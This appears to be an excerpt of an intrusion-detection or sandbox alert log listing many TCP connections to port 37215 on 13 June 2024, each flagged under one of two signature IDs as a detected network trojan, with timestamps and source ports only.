              Timestamp:06/13/24-21:32:56.757412
              SID:2829579
              Source Port:38920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913414
              SID:2835222
              Source Port:46080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458477
              SID:2835222
              Source Port:34658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975424
              SID:2829579
              Source Port:59176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707077
              SID:2835222
              Source Port:56134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453971
              SID:2835222
              Source Port:42032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252279
              SID:2829579
              Source Port:42194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130401
              SID:2835222
              Source Port:52570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419463
              SID:2835222
              Source Port:52824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301353
              SID:2829579
              Source Port:45804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993978
              SID:2835222
              Source Port:43518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884023
              SID:2835222
              Source Port:54920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458156
              SID:2835222
              Source Port:59224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525587
              SID:2829579
              Source Port:45650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610938
              SID:2829579
              Source Port:57470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831225
              SID:2829579
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820260
              SID:2835222
              Source Port:58404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166161
              SID:2829579
              Source Port:37714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545751
              SID:2829579
              Source Port:53206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695969
              SID:2835222
              Source Port:38624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278817
              SID:2835222
              Source Port:39440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929054
              SID:2835222
              Source Port:37758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977342
              SID:2829579
              Source Port:43040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554961
              SID:2835222
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832194
              SID:2835222
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222980
              SID:2829579
              Source Port:43350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554195
              SID:2829579
              Source Port:42982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419921
              SID:2829579
              Source Port:50846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149306
              SID:2835222
              Source Port:49500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217609
              SID:2829579
              Source Port:37224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358732
              SID:2835222
              Source Port:48764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042614
              SID:2835222
              Source Port:45950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112550
              SID:2835222
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832594
              SID:2835222
              Source Port:57786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079675
              SID:2829579
              Source Port:42652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913308
              SID:2829579
              Source Port:48474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040034
              SID:2835222
              Source Port:53826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783868
              SID:2835222
              Source Port:60936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176782
              SID:2835222
              Source Port:51234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994432
              SID:2829579
              Source Port:33626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194964
              SID:2829579
              Source Port:43340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402759
              SID:2829579
              Source Port:38664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989692
              SID:2835222
              Source Port:36226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842063
              SID:2829579
              Source Port:38106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255343
              SID:2835222
              Source Port:41496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670664
              SID:2829579
              Source Port:41560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308787
              SID:2835222
              Source Port:59838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658149
              SID:2835222
              Source Port:49812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318558
              SID:2829579
              Source Port:49932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192958
              SID:2829579
              Source Port:38068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544420
              SID:2835222
              Source Port:42224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819566
              SID:2835222
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219148
              SID:2829579
              Source Port:60404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214634
              SID:2829579
              Source Port:46898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355429
              SID:2829579
              Source Port:47226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369906
              SID:2829579
              Source Port:39312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710156
              SID:2829579
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159334
              SID:2829579
              Source Port:38612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301843
              SID:2829579
              Source Port:59874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507517
              SID:2835222
              Source Port:35222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836193
              SID:2829579
              Source Port:44768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307304
              SID:2829579
              Source Port:50008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418042
              SID:2829579
              Source Port:46530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547138
              SID:2829579
              Source Port:41662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307799
              SID:2835222
              Source Port:33352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731572
              SID:2829579
              Source Port:55064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220172
              SID:2829579
              Source Port:42476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610905
              SID:2835222
              Source Port:49910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406216
              SID:2829579
              Source Port:58698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454021
              SID:2835222
              Source Port:58026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152754
              SID:2829579
              Source Port:46280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711833
              SID:2829579
              Source Port:41924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159139
              SID:2835222
              Source Port:35102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424540
              SID:2829579
              Source Port:50432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913494
              SID:2835222
              Source Port:36332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057800
              SID:2835222
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754794
              SID:2829579
              Source Port:51356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835432
              SID:2829579
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610701
              SID:2835222
              Source Port:37296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676286
              SID:2835222
              Source Port:46140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027769
              SID:2835222
              Source Port:43158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611033
              SID:2829579
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675802
              SID:2829579
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308913
              SID:2835222
              Source Port:42080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488525
              SID:2835222
              Source Port:40468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198038
              SID:2835222
              Source Port:42780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819964
              SID:2835222
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078596
              SID:2829579
              Source Port:50398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085687
              SID:2835222
              Source Port:54238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129442
              SID:2835222
              Source Port:55364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.748612
              SID:2829579
              Source Port:38758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026409
              SID:2835222
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379980
              SID:2829579
              Source Port:59062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094178
              SID:2835222
              Source Port:35484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128063
              SID:2835222
              Source Port:33744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353700
              SID:2829579
              Source Port:55268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316619
              SID:2829579
              Source Port:48930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091969
              SID:2829579
              Source Port:47152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784937
              SID:2835222
              Source Port:41136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231687
              SID:2835222
              Source Port:37140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.380426
              SID:2835222
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460156
              SID:2829579
              Source Port:54296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991434
              SID:2829579
              Source Port:60650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130933
              SID:2829579
              Source Port:55648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091075
              SID:2835222
              Source Port:48870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194736
              SID:2835222
              Source Port:52912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339438
              SID:2829579
              Source Port:57288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787417
              SID:2835222
              Source Port:45316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177385
              SID:2835222
              Source Port:56388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785814
              SID:2835222
              Source Port:55400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838244
              SID:2829579
              Source Port:59306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255665
              SID:2835222
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165315
              SID:2835222
              Source Port:44830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635925
              SID:2829579
              Source Port:42116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675038
              SID:2829579
              Source Port:57924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804805
              SID:2835222
              Source Port:48618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174571
              SID:2835222
              Source Port:47528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376624
              SID:2835222
              Source Port:58440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834397
              SID:2829579
              Source Port:58352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820200
              SID:2835222
              Source Port:39152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973570
              SID:2829579
              Source Port:33482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058422
              SID:2835222
              Source Port:46036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968257
              SID:2829579
              Source Port:57826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307719
              SID:2829579
              Source Port:54908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987665
              SID:2829579
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569364
              SID:2829579
              Source Port:54408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168092
              SID:2829579
              Source Port:35192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507487
              SID:2829579
              Source Port:44846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.153997
              SID:2835222
              Source Port:59242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990302
              SID:2829579
              Source Port:43212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726515
              SID:2835222
              Source Port:46424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214315
              SID:2829579
              Source Port:57274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308071
              SID:2835222
              Source Port:55394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486707
              SID:2835222
              Source Port:42080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677821
              SID:2829579
              Source Port:45738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755946
              SID:2835222
              Source Port:34066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159477
              SID:2835222
              Source Port:33806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177814
              SID:2835222
              Source Port:34088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310285
              SID:2829579
              Source Port:43470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800013
              SID:2829579
              Source Port:52898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011790
              SID:2835222
              Source Port:44092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420138
              SID:2835222
              Source Port:50094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452811
              SID:2835222
              Source Port:44524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660566
              SID:2829579
              Source Port:50386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025419
              SID:2835222
              Source Port:55130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488241
              SID:2835222
              Source Port:39350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609864
              SID:2835222
              Source Port:45628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994703
              SID:2829579
              Source Port:52750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475360
              SID:2835222
              Source Port:56208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974580
              SID:2835222
              Source Port:46534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439026
              SID:2835222
              Source Port:34738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991237
              SID:2829579
              Source Port:50038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262929
              SID:2829579
              Source Port:37936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378487
              SID:2835222
              Source Port:42236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694823
              SID:2829579
              Source Port:56910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567257
              SID:2829579
              Source Port:54178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403450
              SID:2835222
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821069
              SID:2829579
              Source Port:40210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247564
              SID:2835222
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503671
              SID:2835222
              Source Port:46494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274475
              SID:2835222
              Source Port:41566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678880
              SID:2835222
              Source Port:37712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230515
              SID:2829579
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783565
              SID:2829579
              Source Port:41716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487240
              SID:2835222
              Source Port:47758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194795
              SID:2829579
              Source Port:55088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217128
              SID:2829579
              Source Port:51488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040778
              SID:2829579
              Source Port:53726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474737
              SID:2835222
              Source Port:48230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990741
              SID:2835222
              Source Port:59674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546924
              SID:2829579
              Source Port:51086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547477
              SID:2835222
              Source Port:52476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607760
              SID:2835222
              Source Port:59274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127144
              SID:2829579
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177114
              SID:2829579
              Source Port:37758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629981
              SID:2835222
              Source Port:35376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975864
              SID:2829579
              Source Port:42762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.080028
              SID:2829579
              Source Port:48128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677315
              SID:2829579
              Source Port:43606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271029
              SID:2835222
              Source Port:47872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632751
              SID:2829579
              Source Port:44782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308303
              SID:2835222
              Source Port:34478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043705
              SID:2835222
              Source Port:36002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785820
              SID:2829579
              Source Port:51544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954515
              SID:2835222
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508361
              SID:2835222
              Source Port:38996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087079
              SID:2835222
              Source Port:41432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212152
              SID:2835222
              Source Port:35392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177163
              SID:2829579
              Source Port:58662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630491
              SID:2829579
              Source Port:36228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248044
              SID:2829579
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056472
              SID:2829579
              Source Port:44834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378082
              SID:2835222
              Source Port:57972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099077
              SID:2835222
              Source Port:58114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200129
              SID:2835222
              Source Port:44872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833977
              SID:2829579
              Source Port:34280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755873
              SID:2829579
              Source Port:37982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133595
